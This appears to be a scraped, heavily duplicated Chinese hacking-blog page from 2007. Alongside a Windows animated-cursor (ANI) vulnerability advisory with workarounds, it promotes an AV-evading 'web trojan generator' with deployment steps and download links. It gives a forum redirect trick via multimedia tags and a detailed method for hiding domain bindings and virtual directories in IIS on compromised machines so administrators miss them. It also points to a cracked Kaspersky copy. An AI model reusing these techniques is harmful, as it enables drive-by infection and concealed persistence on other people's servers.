Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Outlook Express 6.0 SP2
Microsoft Outlook Express 6.0 SP1
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP Home SP1
+ Microsoft Windows XP Professional SP1
Microsoft Outlook Express 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Media Center Edition
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Tablet PC Edition
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Citrix ICA Client for Windows 4.0 SP6a
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
Microsoft Windows动画光标畸形ANI头结构远程栈溢出漏洞
发布日期:2007-03-29
更新日期:2007-03-30
受影响系统:
Microsoft Windows XPSP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
Microsoft Security Advisory (935423)
Vulnerability in Windows Animated Cursor Handling
临时解决方法:
* 以纯文本格式读取邮件
* 禁用预览栏
* 配置Windows资源管理器使用Windows传统风格的文件夹:
打开Windows资源管理器
在“工具”菜单中选择“文件夹”选项
在“任务”部分选择“使用Windows传统风格的文件夹”
参考:
Microsoft Windows animated cursor ANI header stack buffer overflow
Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution Vulnerability
Exploit Download
联系作者:xs_soft@qq.com
最新漏洞的IE网页木马生成器
功能如下:
已测试过windows Xp sp2全补丁
几乎所有xp系统通杀
免杀 不卡 不弹窗 不关窗
使用最新的漏洞
使用说明:
两个地址都要填 其它最重要的就是那张图片木马
tk.htm就是调用那只图片木马
然后
把生成后的tk.htm和2..jpg
把2.jpg改成你的图片马址.jpg分别传上你的空间
或自己写htm调用图片木马
配合本身自写的加密器一般就比较爽了
另外网马免杀加密器不发 不要跟我要
图示如下:
Exploit Download
点我下载
文章来自
Bugtraq ID: 23194
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2007-1765
Remote: Yes
Local: No
Published: Mar 29 2007 12:00AM
Updated: Mar 30 2007 10:23PM
Credit: McAfee AVERT is credited with the discovery of this issue.
Vulnerable: Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Vista December CTP
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business
Microsoft Windows Vista beta 2
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Vista 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Mail 0
Microsoft Windows 2000 Server Japanese Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server
+ Avaya S8100 Media Servers
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Outlook Express 6.0 SP2
Microsoft Outlook Express 6.0 SP1
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP Home SP1
+ Microsoft Windows XP Professional SP1
Microsoft Outlook Express 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Media Center Edition
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Tablet PC Edition
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Citrix ICA Client for Windows 4.0 SP6a
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
Microsoft Windows动画光标畸形ANI头结构远程栈溢出漏洞
发布日期:2007-03-29
更新日期:2007-03-30
受影响系统:
Microsoft Windows XPSP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
Microsoft Security Advisory (935423)
Vulnerability in Windows Animated Cursor Handling
临时解决方法:
* 以纯文本格式读取邮件
* 禁用预览栏
* 配置Windows资源管理器使用Windows传统风格的文件夹:
打开Windows资源管理器
在“工具”菜单中选择“文件夹”选项
在“任务”部分选择“使用Windows传统风格的文件夹”
参考:
Microsoft Windows animated cursor ANI header stack buffer overflow
Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution Vulnerability
Exploit Download
联系作者:xs_soft@qq.com
最新漏洞的IE网页木马生成器
功能如下:
已测试过windows Xp sp2全补丁
几乎所有xp系统通杀
免杀 不卡 不弹窗 不关窗
使用最新的漏洞
使用说明:
两个地址都要填 其它最重要的就是那张图片木马
tk.htm就是调用那只图片木马
然后
把生成后的tk.htm和2..jpg
把2.jpg改成你的图片马址.jpg分别传上你的空间
或自己写htm调用图片木马
配合本身自写的加密器一般就比较爽了
另外网马免杀加密器不发 不要跟我要
图示如下:
Exploit Download
点我下载
文章来自
通杀所有论坛最新漏洞
作者:天晴无名氏 日期:2007-03-28 17:03
<< >>
代码如下:
http://www.mmbest.com/qq.swf?url=http://你要打开的网页地址
在发帖时,以插入多媒体标签方式(如flash,mp3,mp,wmv,rm等)调用上述代码,可实现打开帖子直接跳转到你想要的网址,如果某个多媒体标签无效,可换另一个重试,目前各大论坛基本未对此做出防范。
code]演示2:[mp3]http://www.mmbest.com/qq.swf?url=http://www.sohu.com[/mp3][/code]
请各论坛管理员及时去掉多媒体标签的使用,以免给论坛造成严重损失.
文章转自木马帝国论坛
代码如下:
http://www.mmbest.com/qq.swf?url=http://你要打开的网页地址
在发帖时,以插入多媒体标签方式(如flash,mp3,mp,wmv,rm等)调用上述代码,可实现打开帖子直接跳转到你想要的网址,如果某个多媒体标签无效,可换另一个重试,目前各大论坛基本未对此做出防范。
code]演示2:[mp3]http://www.mmbest.com/qq.swf?url=http://www.sohu.com[/mp3][/code]
请各论坛管理员及时去掉多媒体标签的使用,以免给论坛造成严重损失.
文章转自木马帝国论坛
标签: {275}{276} 最新漏洞
IIS里隐藏绑定域名,建立网站(肉鸡上及好用)
作者:天晴无名氏 日期:2007-03-27 22:31
在iis里隐藏绑定域名
工具:ff1.exe
下载:http://download.77169.net/soft/h ... 041206024932758.zip
用于在肉机上绑定域名。
使用方法:
上传文件到肉机上,建议把fmulti.dll放在SYSTEM32目录下,然后在注册表的HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters下,把Filter DLLs修改成为fmulti.dll的地址。
然后运行ff1.exe添加域名(可以同时绑定两个):
网址1,网址2就是你的要绑定的域名,一个也可以
目录填你放网站的绝对路径,
注意:ff1.exe要在同一个目录下运行(那时我就没有,一直搞不行)
然后重新启动一下肉鸡的W3SVC(全名:World Wide Web Publishing Service)服务和WEB服务即可!
最后你在域名控制面板里把域名绑定到这个肉鸡的IP即可
这样域名就绑定成功了,24小时内生效,在肉鸡的IIS管理里面也看不见,管理员很难发现的。
OK了,你可以输入网址访问了。
呵呵…不用空间也可以玩网站,不错吧。
以上是本人自己的使用心得,网络上有类似的文章,但没有这么详细。
那时候本人要用,可是苦于找不到详细的使用方法(那时候我比较菜,不会用),只能自己研究,才有了以上st的详细方法。
拿出来大家分享,好的话帮忙顶一下!!
附:在IIS中建立隐藏的虚拟目录!!
打开iis的管理器--选定一个文件夹--右建--资源管理器,到网站的根目录,新建一个文件夹这里取名为free,我们到winntsystem32那里新建一个文件夹取名homepage,回到iis的管理器刷新就会看到,free这个目录,选中他右键--新建---虚拟目录,给这个虚拟目录取名axin,把这个虚拟目录指向winntsystem32homepage,建立完成,现在放个首页进去,打开浏览器http://ip/free/axin应该可以正常浏览!!好了别管他,打开我的电脑找到网站的根目录删掉free这个文件夹,再回到浏览器刷新看看,晕倒,网页依然存在,回到iis的管理器刷新看看,free这个目录没有了,怎么这样啊,哈哈哈~~~~~~
工具:ff1.exe
下载:http://download.77169.net/soft/h ... 041206024932758.zip
用于在肉机上绑定域名。
使用方法:
上传文件到肉机上,建议把fmulti.dll放在SYSTEM32目录下,然后在注册表的HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters下,把Filter DLLs修改成为fmulti.dll的地址。
然后运行ff1.exe添加域名(可以同时绑定两个):
网址1,网址2就是你的要绑定的域名,一个也可以
目录填你放网站的绝对路径,
注意:ff1.exe要在同一个目录下运行(那时我就没有,一直搞不行)
然后重新启动一下肉鸡的W3SVC(全名:World Wide Web Publishing Service)服务和WEB服务即可!
最后你在域名控制面板里把域名绑定到这个肉鸡的IP即可
这样域名就绑定成功了,24小时内生效,在肉鸡的IIS管理里面也看不见,管理员很难发现的。
OK了,你可以输入网址访问了。
呵呵…不用空间也可以玩网站,不错吧。
以上是本人自己的使用心得,网络上有类似的文章,但没有这么详细。
那时候本人要用,可是苦于找不到详细的使用方法(那时候我比较菜,不会用),只能自己研究,才有了以上st的详细方法。
拿出来大家分享,好的话帮忙顶一下!!
附:在IIS中建立隐藏的虚拟目录!!
打开iis的管理器--选定一个文件夹--右建--资源管理器,到网站的根目录,新建一个文件夹这里取名为free,我们到winntsystem32那里新建一个文件夹取名homepage,回到iis的管理器刷新就会看到,free这个目录,选中他右键--新建---虚拟目录,给这个虚拟目录取名axin,把这个虚拟目录指向winntsystem32homepage,建立完成,现在放个首页进去,打开浏览器http://ip/free/axin应该可以正常浏览!!好了别管他,打开我的电脑找到网站的根目录删掉free这个文件夹,再回到浏览器刷新看看,晕倒,网页依然存在,回到iis的管理器刷新看看,free这个目录没有了,怎么这样啊,哈哈哈~~~~~~
卡巴KAV7.0.0.6简体汉化中文版本
作者:天晴无名氏 日期:2007-03-26 20:58
在Vista系统中升级到7.0.0.6使用后外观介绍
在保护项目中没什么变化
扫描项目也没变化 扫描窗口增加show details的功能
服务项目的升级窗口也增加了show details的功能,显示了key的具体使用时间天数
系统资源使用状况
占内存闲时8M左右 忙时17M左右
CPU资源正常使用下基本不消耗 做全盘扫描时有安装文件或压缩文件大过1G时会使用较高的CPU资源以及内存资源导致电脑反应极慢 一般跳过自己信任的大型安装文件或压缩文件已避免影响电脑的使用。
7.0汉化破解版下载地址:http://www.orsoon.com/
因为不能盗链就麻烦查关键字 卡巴
